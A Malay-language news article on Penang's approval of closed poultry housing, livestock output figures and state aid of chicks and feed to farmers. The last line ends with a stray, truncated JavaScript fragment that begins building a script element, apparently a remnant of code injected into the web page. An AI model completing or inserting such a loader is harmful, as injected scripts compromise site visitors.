Sistem reban tertutup unggas, Exco jangka produktiviti penternak kian meningkat

Gambar : ADUN

PULAU BETONG – Sebagaimana digariskan Kerajaan Pusat, sistem reban tertutup unggas yang telah diluluskan pelaksanaannya di Pulau Pinang dijangka meningkatkan lagi hasil ternak tahunan negeri.

Exco Pertanian & Industri Asas Tani, Pembangunan Desa dan Kesihatan, Dr. Afif Bahrain berkata demikian pada Majlis Pemberian Bantuan Projek Penternakan Unggas Dan Blok Mineral Peringkat Daerah Barat Daya baru-baru ini.

“Nilai Hasil Tahunan (NHT) telah merekodkan nilaian pengeluaran bernilai RM832 juta pada tahun 2015, yang mana pengeluaran ayam (dan) itik sahaja telah menyumbang RM510 juta atau 61 peratus, dan dijangka akan terus meningkat pada tahun 2016.

“Dalam persekitaran (sistem reban tertutup unggas) selesa, produktiviti ayam dapat dipertingkatkan.

“Sistem (reban tertutup unggas) ini boleh mengatasi masalah bau, kacau ganggu lalat, pencemaran habuk dan boleh memberi pendapatan yang lebih kerana kadar bilangan ternakan yang banyak dengan keluasan ruangan lantai berbanding dengan sistem bangsal terbuka,” jelasnya yang juga Ahli Dewan Undangan Negeri (ADUN) Seberang Jaya dalam majlis rasmi anjuran Jabatan Perkhidmatan Veterinar (JPV) Negeri di Titi Teras dekat Kawasan Parlimen Balik Pulau di sini.

Pada tahun 2016 , Afif memberitahu bahawa sejumlah 9,000 ekor anak ayam kampung serta 200 kilogram (kg) makanan diedarkan kepada 180 penternak di negeri ini.

Menurut beliau, seramai 45 penternak meliputi kelima-lima daerah menerima 2,250 ekor anak ayam beserta 50kg makanan, sama ada untuk memula atau menambah jumlah ternakan sedia ada.

Itu, tambah Afif, tidak termasuk pemberian bantuan berupa 500 ekor anak ayam piru berumur dua minggu serta 2,000kg makanan dan 60 pasu rumput ‘Napier’ kepada 20 penternak lain yang layak.

“Kesejahteraan penternak tradisi secara kecilan tidak dilupa…bantuan seperti ini setiap tahun disediakan oleh Kerajaan Negeri melalui JPV untuk penternak di seluruh negeri,” jelas beliau.var d=document;var s=d.createElement(‘script’);